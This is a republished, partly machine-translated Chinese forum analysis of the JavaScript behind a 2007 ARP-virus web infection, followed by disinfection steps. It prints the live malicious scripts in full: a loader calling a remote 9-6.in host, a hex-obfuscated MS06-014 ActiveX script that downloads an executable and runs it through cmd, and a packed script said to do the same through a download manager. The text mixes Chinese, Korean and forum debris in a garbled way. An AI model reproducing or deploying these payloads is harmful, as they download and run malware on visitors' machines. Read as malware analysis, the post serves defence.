arp 바이러스의 이면에 사용된 자바스크립트 기술을 복호화 방법으로 분석_javascript 기술

WBOY
풀어 주다: 2016-05-16 19:10:57
원래의
948명이 탐색했습니다.

本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!

最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!

现象:打开部分网页显示为乱码,好像是随机的行为,但是看似又不是,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现头部有一个js文件链接----<script></script>;

来源:经过一番网络搜索,发现这个域名是印度域名,而IP地址却是美国的,而且域名的注册日期是7月25日,看来一切都是预谋好了的,还是不管这个了,先解决问题吧;

分析:
1、先把(http://9-6.in/n.js)这个JS文件下载下来,代码如下: 

    document.writeln("<script>window.onerror=function(){return true;}<\/script>"); <BR> document.writeln("<script src=\"http:\/\/9-6.in\/S368\/NewJs2.js\"><\/script>"); <BR> document.writeln("<script>"); <BR> document.writeln("function StartRun(){"); <BR> document.writeln("var Then = new Date() "); <BR> document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); <BR> document.writeln("var cookieString = new String(document.cookie)"); <BR> document.writeln("var cookieHeader = \"Cookie1=\" "); <BR> document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); <BR> document.writeln("if (beginPosition != -1){ "); <BR> document.writeln("} else "); <BR> document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); <BR> document.writeln("document.write(\'<iframe width=0 height=0 src=\"http:\/\/9-6.IN\/s368\/T368.htm\"><\/iframe>\');"); <BR> document.writeln("}"); <BR> document.writeln("}"); <BR> document.writeln("StartRun();"); <BR> document.writeln("<\/script>") <BR>其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉,真够狠的,呵呵,不这样怎么隐藏自己呢,哈哈!然后还有个JS文件http://9-6.in/S368/NewJs2.js,先继续往下看,找到StartRun();运行一个函数,函数的主要作用是写COOKIE,日期为保存一天,然后还用隐藏框架加载了一个文件(http://9-6.IN/s368/T368.htm),其余就没有什么特别的了; <BR>2、下载(http://9-6.in/S368/NewJs2.js)这个文件,代码如下: <br><br>StrInfo = "\x3c\x73\x63\x72\x69\x70\x74\x3e\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e \x74\x72\x75\x65\x3b\x7d\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e" +"\n"+ <BR> "\x3c\x73\x63\x72\x69\x70\x74\x3e" +"\n"+ <BR> " \x44\x5a\x3d\'\\\x78\x36\x38\\\x78\x37\x34\\\x78\x37\x34\\\x78\x37\x30\\\x78\x33\x41\\\x78\x32\x46\\\x78\x32\x46\\\x78\x33\x39\\\x78\x32\x44\\\x78\x33\x36\\\x78\x32\x45\\\x78\x36\x39\\\x78\x36\x45\\\x78\x32\x46\\\x78\x35\x33\\\x78\x33\x33\\\x78\x33\x36\\\x78\x33\x38\\\x78\x32\x46\\\x78\x35\x33\\\x78\x33\x33\\\x78\x33\x36\\\x78\x33\x38\\\x78\x32\x45\\\x78\x36\x35\\\x78\x37\x38\\\x78\x36\x35\'\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> "\x66\x75\x6e\x63\x74\x69\x6f\x6e \x47\x6e\x4d\x73\x28\x6e\x29 " +"\n"+ <BR> "\x7b " +"\n"+ <BR> " \x76\x61\x72 \x6e\x75\x6d\x62\x65\x72\x4d\x73 \x3d \x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x6e\x3b" +"\n"+ <BR> " \x72\x65\x74\x75\x72\x6e \'\\\x78\x37\x45\\\x78\x35\x34\\\x78\x36\x35\\\x78\x36\x44\\\x78\x37\x30\'\x2b\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x75\x6d\x62\x65\x72\x4d\x73\x29\x2b\'\\\x78\x32\x45\\\x78\x37\x34\\\x78\x36\x44\\\x78\x37\x30\'\x3b" +"\n"+ <BR> "\x7d " +"\n"+ <BR> " \x74\x72\x79 " +"\n"+ <BR> "\x7b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> " \x76\x61\x72 \x42\x66\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\"\\\x78\x36\x46\\\x78\x36\x32\\\x78\x36\x41\\\x78\x36\x35\\\x78\x36\x33\\\x78\x37\x34\"\x29\x3b" +"\n"+ <BR> " \x42\x66\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\"\\\x78\x36\x33\\\x78\x36\x43\\\x78\x36\x31\\\x78\x37\x33\\\x78\x37\x33\\\x78\x36\x39\\\x78\x36\x34\"\x2c\"\\\x78\x36\x33\\\x78\x36\x43\\\x78\x37\x33\\\x78\x36\x39\\\x78\x36\x34\\\x78\x33\x41\\\x78\x34\x32\\\x78\x34\x34\\\x78\x33\x39\\\x78\x33\x36\\\x78\x34\x33\\\x78\x33\x35\\\x78\x33\x35\\\x78\x33\x36\\\x78\x32\x44\\\x78\x33\x36\\\x78\x33\x35\\\x78\x34\x31\\\x78\x33\x33\\\x78\x32\x44\\\x78\x33\x31\\\x78\x33\x31\\\x78\x34\x34\\\x78\x33\x30\\\x78\x32\x44\\\x78\x33\x39\\\x78\x33\x38\\\x78\x33\x33\\\x78\x34\x31\\\x78\x32\x44\\\x78\x33\x30\\\x78\x33\x30\\\x78\x34\x33\\\x78\x33\x30\\\x78\x33\x34\\\x78\x34\x36\\\x78\x34\x33\\\x78\x33\x32\\\x78\x33\x39\\\x78\x34\x35\\\x78\x33\x33\\\x78\x33\x36\"\x29\x3b" +"\n"+ <BR> " \x76\x61\x72 \x4b\x78\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x34\x44\\\x78\x36\x39\\\x78\x36\x33\\\x78\x37\x32\\\x78\x36\x46\\\x78\x37\x33\\\x78\x36\x46\\\x78\x36\x36\\\x78\x37\x34\\\x78\x32\x45\\\x78\x35\x38\"\x2b\"\\\x78\x34\x44\\\x78\x34\x43\\\x78\x34\x38\\\x78\x35\x34\\\x78\x35\x34\\\x78\x35\x30\"\x2c\"\"\x29\x3b" +"\n"+ <BR> " \x76\x61\x72 \x41\x53\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x34\x31\\\x78\x36\x34\\\x78\x36\x46\\\x78\x36\x34\\\x78\x36\x32\\\x78\x32\x45\\\x78\x35\x33\\\x78\x37\x34\\\x78\x37\x32\\\x78\x36\x35\\\x78\x36\x31\\\x78\x36\x44\"\x2c\"\"\x29\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> " \x41\x53\x2e\x74\x79\x70\x65\x3d\x31\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> " \x4b\x78\x2e\x6f\x70\x65\x6e\x28\"\\\x78\x34\x37\\\x78\x34\x35\\\x78\x35\x34\"\x2c \x44\x5a\x2c\x30\x29\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> " \x4b\x78\x2e\x73\x65\x6e\x64\x28\x29\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> " \x4e\x73\x31\x3d\x47\x6e\x4d\x73\x28\x39\x39\x39\x39\x29\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> " \x76\x61\x72 \x63\x46\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x35\x33\\\x78\x36\x33\\\x78\x37\x32\\\x78\x36\x39\\\x78\x37\x30\\\x78\x37\x34\\\x78\x36\x39\\\x78\x36\x45\\\x78\x36\x37\\\x78\x32\x45\\\x78\x34\x36\\\x78\x36\x39\\\x78\x36\x43\\\x78\x36\x35\\\x78\x35\x33\\\x78\x37\x39\\\x78\x37\x33\\\x78\x37\x34\\\x78\x36\x35\\\x78\x36\x44\\\x78\x34\x46\\\x78\x36\x32\\\x78\x36\x41\\\x78\x36\x35\\\x78\x36\x33\\\x78\x37\x34\"\x2c\"\"\x29\x3b" +"\n"+ <BR> " \x76\x61\x72 \x4e\x73\x54\x6d\x70\x3d\x63\x46\x2e\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6c\x46\x6f\x6c\x64\x65\x72\x28\x30\x29\x3b \x4e\x73\x31\x3d \x63\x46\x2e\x42\x75\x69\x6c\x64\x50\x61\x74\x68\x28\x4e\x73\x54\x6d\x70\x2c\x4e\x73\x31\x29\x3b \x41\x53\x2e\x4f\x70\x65\x6e\x28\x29\x3b\x41\x53\x2e\x57\x72\x69\x74\x65\x28\x4b\x78\x2e\x72\x65\x73\x70\x6f\x6e\x73\x65\x42\x6f\x64\x79\x29\x3b" +"\n"+ <BR> " \x41\x53\x2e\x53\x61\x76\x65\x54\x6f\x46\x69\x6c\x65\x28\x4e\x73\x31\x2c\x32\x29\x3b \x41\x53\x2e\x43\x6c\x6f\x73\x65\x28\x29\x3b \x76\x61\x72 \x71\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x35\x33\\\x78\x36\x38\\\x78\x36\x35\\\x78\x36\x43\\\x78\x36\x43\\\x78\x32\x45\\\x78\x34\x31\\\x78\x37\x30\\\x78\x37\x30\\\x78\x36\x43\\\x78\x36\x39\\\x78\x36\x33\\\x78\x36\x31\\\x78\x37\x34\\\x78\x36\x39\\\x78\x36\x46\\\x78\x36\x45\"\x2c\"\"\x29\x3b" +"\n"+ <BR> " \x6f\x6b\x31\x3d\x63\x46\x2e\x42\x75\x69\x6c\x64\x50\x61\x74\x68\x28\x4e\x73\x54\x6d\x70\x2b\'\\\x78\x35\x43\\\x78\x35\x43\\\x78\x37\x33\\\x78\x37\x39\\\x78\x37\x33\\\x78\x37\x34\\\x78\x36\x35\\\x78\x36\x44\\\x78\x33\x33\\\x78\x33\x32\'\x2c\'\\\x78\x36\x33\\\x78\x36\x44\\\x78\x36\x34\\\x78\x32\x45\\\x78\x36\x35\\\x78\x37\x38\\\x78\x36\x35\'\x29\x3b" +"\n"+ <BR> " \x71\x2e\x53\x48\x65\x4c\x4c\x45\x78\x65\x63\x75\x74\x65\x28\x6f\x6b\x31\x2c\'\\\x78\x32\x30\\\x78\x32\x46\\\x78\x36\x33 \'\x2b\x4e\x73\x31\x2c\"\"\x2c\"\\\x78\x36\x46\\\x78\x37\x30\\\x78\x36\x35\\\x78\x36\x45\"\x2c\x30\x29\x3b" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> "\x7d " +"\n"+ <BR> " \x63\x61\x74\x63\x68\x28\x4d\x73\x49\x29 \x7b \x4d\x73\x49\x3d\x31\x3b \x7d" +"\n"+ <BR> " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ <BR> "\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e" <BR>window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](StrInfo); <BR>这个代码有点长哦,而且有保护措施,全部转换为十六进制,不过不要害怕,我们有办法解决,首先得确保你已经安装了UE,然后打开UE,把代码粘贴进去(废话,呵呵),把x替换为%,然后用html代码转换功能,解码,就可以得到第一次解码的代码,第一次???,呵呵,这个代码的作者很变态的,做了两次编码,所以我得进行两次解码才行,重复刚才的步骤,然后你就可以看到最终的“原始”代码了; <BR>具体的代码我就不帖出来了,有一定的危害性,相信大家看了上面的步骤都能自己找到代码,这里之说一下比较核心的代码吧; <br><br>[Copy to clipboard] [ - ]CODE: <BR>//核心代码 <BR>.............. <BR> " var Bf=document.createElement(\"\o\b\j\e\c\t\");" +"\n"+ <BR> " Bf.setAttribute(\"\c\l\a\s\s\i\d\",\"\c\l\s\i\d\:\B\D\9\6\C\5\5\6\-\6\5\A\3\-\1\1\D\0\-\9\8\3\A\-\0\0\C\0\4\F\C\2\9\E\3\6\");" +"\n"+ <BR> " var Kx=Bf.CreateObject(\"\M\i\c\r\o\s\o\f\t\.\X\"+\"\M\L\H\T\T\P\",\"\");" +"\n"+ <BR> " var AS=Bf.CreateObject(\"\A\d\o\d\b\.\S\t\r\e\a\m\",\"\");" +"\n"+ <BR>............. <BR> " var cF=Bf.CreateObject(\"\S\c\r\i\p\t\i\n\g\.\F\i\l\e\S\y\s\t\e\m\O\b\j\e\c\t\",\"\");" +"\n"+ <BR> " var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"\n"+ <BR> " AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(\"\S\h\e\l\l\.\A\p\p\l\i\c\a\t\i\o\n\",\"\");" +"\n"+ <BR> " ok1=cF.BuildPath(NsTmp+\'\\\\\s\y\s\t\e\m\3\2\',\'\c\m\d\.\e\x\e\');" +"\n"+ <BR> " q.SHeLLExecute(ok1,\'\ \/\c \'+Ns1,\"\",\"\o\p\e\n\",0);" +"\n"+ <BR>.............. <BR>上面的就是最为核心的代码,利用MS0614漏洞、创建JS异步对象获取病毒(*.exe)文件,然后运行,这样就达到它的目的啦! <BR>3、打开http://9-6.IN/s368/T368.htm查看源代码,又发现一段怪异的JS文件,如下: <br><br>[Copy to clipboard] [ - ]CODE: <BR><script> <BR> eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('x("\\0\\6\\9\\5\\i\\h\\j\\j\\4\\f\\8\\3\\2\\0\\7\\1\\i\\8\\2\\3\\h\\g\\4\\w\\v\\u\\t\\b\\s\\7\\r\\g\\4\\e\\f\\q\\8\\3\\2\\0\\7\\1\\e\\4\\d\\c\\d\\c\\p\\5\\3\\o\\n\\a\\6\\1\\b\\m\\2\\0\\1\\a\\l\\0\\6\\9\\5\\k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{})) <BR></script>



本帖最近评分记录
bound0   2007-8-6 19:01   威望   +1   鼓励研究精神!:D 

 引用  报告 回复  心中有梦 
[广告] 【万网邮箱DIY,灵活购买】| 西部数码多线虚拟主机全国10强 

veking [楼主] 

蓝色水 
高级会员


帖子 275
体力 733 
威望 1 
注册 2005-6-16
 #2发表于 2007-8-6 16:06  资料  短消息  加为好友      
解析arp病毒背后利用的Javascript技术


可以看出这段代码也是经过加密的了,特征为function(p,a,c,k,e,d),这种加密方法网上有很多例子,我就不细说了,附上解密代码:

[Copy to clipboard] [ - ]CODE:
//以下代码为网上搜索所得,版权归原作者所有
nbsp;html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



无标题文档


<script> <BR>a=62; <BR>function encode() { <BR>var code = document.getElementById('code').value; <BR>code = code.replace(/[\r\n]+/g, ''); <BR>code = code.replace(/'/g, "\\'"); <BR>var tmp = code.match(/\b(\w+)\b/g); <BR>tmp.sort(); <BR>var dict = []; <BR>var i, t = ''; <BR>for(var i=0; i<tmp .length; i++) { <BR> if(tmp[i] != t) dict.push(t = tmp[i]); <BR>} <BR>var len = dict.length; <BR>var ch; <BR>for(i=0; i<len; i++) { <BR> ch = num(i); <BR> code = code.replace(new RegExp('\\b'+dict[i]+'\\b','g'), ch); <BR> if(ch == dict[i]) dict[i] = ''; <BR>} <BR>document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}(" <BR> + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))"; <BR>} <br><br>function num(c) { <BR>return(c<a ?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36)); <BR>} <br><br>function run() { <BR>eval(document.getElementById('code').value); <BR>} <BR>function decode() { <BR>var code = document.getElementById('code').value; <BR>code = code.replace(/^eval/, ''); <BR>document.getElementById('code').value = eval(code); <BR>} <BR></script> 

 
 
 



经过解密后代码为:

[Copy to clipboard] [ - ]CODE:
info =        "<script></script>"
document.write(info)
继续打开这个表面象图片的链接,呵呵,当然不会是MM图片了,查看源代码,找到如下代码:

[Copy to clipboard] [ - ]CODE:
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("\\K\\l\\r\\8\\i\\3\\6\\j\\3\\6\\o\\3\\6\\9\\C\\3\\s\\K\\l\\r\\8\\i\\3\\6\\9\\x")}1g(e){Q}E a=n["\\15\\3\\4\\p\\d\\8\\m\\7\\k"]("\\w\\8\\4\\7\\o\\7\\6\\r\\f","\\R\\7\\q\\3\\v\\5\\4\\l","");1h(a["\\7\\8\\i\\3\\y\\L\\m"]("\\z\\f\\l\\4\\5\\9\\3\\y\\3")!=-1){Q}E b=n["\15\3\4\j\3\6\o\3\6\v\5\4\l"]();b=b["\f\r\s\f \4\6"](0,2);b ="\\\v\6\d\k\6\5\J\x\\\K\l\r\8\i\3\J\ x\\\1i\3\s\K\l\r\8\i\3\6\\\A\6\d\m\7\q\3\f\\\r\f\3\ 6\h\d\8\m\7\k\9\7\8\7";n["\j\3\4\p\5\q\q\s\5\h\1j\F \8\4\6\D"](1k,13);E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\7 ");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\5");E c=n["\w\i \i\p\5\4\3\k\d\6\D"]("\s");E c=n["\w\i\i\p\5\4\3\k\ d\6\D"]("\h");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\i") ;n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\7"," \S\f\h\6\7\A\4\16\o\5\6 \f\G\8\3\C \w\h\4\7\o\3\N\L\s \T\3\h\4\t\"\C\f\h\6\7\A\4\9\f\l\3\q\q\"\u\g\o\5\6 \d\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\f\l\3\q\q \9\5\A\A\q\7\h\5\4\7\d\8\"\u\g\o\5\6 \5\B\s\B\h\B\i \B\3\B\m\B\k\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3 \v\5\4\l","\5","\H\g\f\9\U\r\8\t\"\p\V\\\\\v\6\d\k \6\5\J\x\\\\\I\8\4\3\6\8\J\x\\\\\I\F\N\v\17\L\U\F\9 \F\N\F\l\4\4\A\1l\O\O\h\1m\x\W\7\18\O\j\X\19\1a\O\i\1n\C \18\Y\Y\W\l\4\Y\1o\"\B\H\B\H\u\g\f\9\U\r\8\t\"\h\z\i \9\3\y\3 \Z\h \4\6\3\3 \h\V\\\\ \Z\m\"\B\H\B\x\u\g");n ["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\s","\f \9\j\A\3\h\7\5\q\R\d\q\i\3\6\f\t\"\1p\D\1q\d\h\r\z\3 \8\4\f\"\u\g\s\G\s\9\f\r\s\f\4\6\7\8\k\t\H\B\s\9\q \5\f\4\I\8\i\3\y\L\m\t\"\\\\\"\u\u\g\s\P\G\"\\\\\q \d\h\5\q\f\J\x\\\\\K\3\z\A\d\6\J\x\\\\\p\d\8\4\3\8 \4\9\I\F\1r\\\\\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5 \o\3\v\5\4\l","\h","\d\9\1s\5\z\3\j\A\5\h\3\t\s\u\g \m\d\6\t\5\G\H\g\5\S\h\9\I\4\3\z\f\t\u\9\p\d\r\8\4 \g\5\P\P\u\10 \o\5\6 \m\G\h\9\I\4\3\z\f\t\u\9\I\4\3\z \t\5\u\9\v\5\4\l\g\m\P\G\"\\\\\j\X\19\1a\1b\1t\x\1u\W\3 \y\3\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4 \l","\i","\H\g\4\6\D\10\f\9\F\y\3\h\t\m\u\g\11\h\5\4 \h\l\t\3\u\10\11\g\11\C\7\8\i\d\C\9\h\q\d\f\3\t\u\g\S \Z\f\h\6\7\A\4\16");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4 \7\o\7\6\r\f","\v\6\d\4\3\h\4","\x");n["\j\3\4\p\d \8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\R\7\q\3\v\5\4\l" ,"\h\V\\\C\7\8\i\d\C\f\\\f\D\f\4\3\z\X\1b\\\z\f\l\4 \5\9\3\y\3");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7 \6\r\f","\v\5\6\5\z\3\4\3\6",b);n["\j\3\4\p\d\8\m\ 7\k"]("\w\8\4\7\o\7\6\r\f","\F\y\4\17\7\f\4","\9\6\ 5\6\g\9\M\7\A\g\9\3\y\3\g\9\i\d\h\g\9\h\d\z\g\9\s\ 7\8\g\9\k\M\g\9\M\g\9\4\5\6\g\9\5\6\T\g\9\q\M\l\g\ 9\f\7\4\g\9\l\1v\y\g\9\4\k\M\g\9\i\q\q\g\9\d\h\y\g\ 9\o\s\y\g");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\ 6\r\f","\1w\f\3\6\j\3\4","\x");Q}14();',62,95,'|||x65|x74| x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50| x41|x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|반환|x46|x3c|x6a|x52| x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b| 106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好长的代码,又发现了함수(p,a,c,k,e,r),继续解码, 代码很长,请大家自己解码查看吧, 这里应用还是上面的手敶, 用加密函数加密,然后转换为十六进淆, 尽最大努power混淆我们的视线, 来达到不可告人的目的, 这里的代码的主要 창작 사용 是用另一种方法下载病毒并运行 , 思想真的很先进,居然是去调用 Web迅雷来下载病毒,然后去运行,작가真的是煞费苦心啊,应用了两种方法下载病毒,“小样,就不信毒不倒你!", ㅎㅎ ​​
안티 바이러스 : 오랜 시간 이야기를 한 후 ARP 바이러스가 발생했을 때 내가 무엇을 하고 있었는지 분석했습니다. 이제 안티 바이러스 문제에 대해 이야기하겠습니다. 실제로 많은 것이 있습니다. 이 부분에 대해서는 인터넷에서 관련 튜토리얼을 간략히 정리해 보겠습니다.
1. arp 바이러스에 감염되면 먼저 감염된 기기를 찾아야 합니다
2. 네트워크에서 컴퓨터 연결을 끊고 소독하세요.
3. LAN을 복원하세요.
첫 번째 단계가 가장 중요합니다.
LAN에 있는 클라이언트 컴퓨터에서 네트워크 환경을 열고 작업 그룹을 확인하세요. 그런 다음 목록이 새로 고쳐질 때까지 기다렸다가 시작->실행->cmd->arp -a를 빠르게 클릭하고 Enter 키를 누릅니다. 시스템이 많으면 arp -a를 여러 번 입력한 다음 주의 깊게 확인하십시오. , 한 머신의 Mac 주소가 게이트웨이의 Mac 주소와 동일하다는 것을 알 수 있습니다. 축하합니다. 이것이 바이러스의 소스입니다!
이 머신 앞에 가세요(하하! 말도 안되는 소리), 모두가 남은 작업, 바이러스 백신에 많은 경험이 있다고 믿습니다! 바이러스 백신 소프트웨어를 설치하거나 안전 모드로 들어가거나 시스템을 다시 설치하십시오.
마지막으로, 웹 페이지를 열 수 없는 컴퓨터에서 이 명령을 실행합니다. 시작 -> 실행 -> cmd -> arp -d를 클릭하고 Enter를 누르면 모든 것이 다시 조용해집니다. 성취감이 크지 않습니까? , 하하!

드디어 첫 번째 공식 블로그 기술 글이 완성되었습니다. 모두 마음에 드셨으면 좋겠습니다

원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿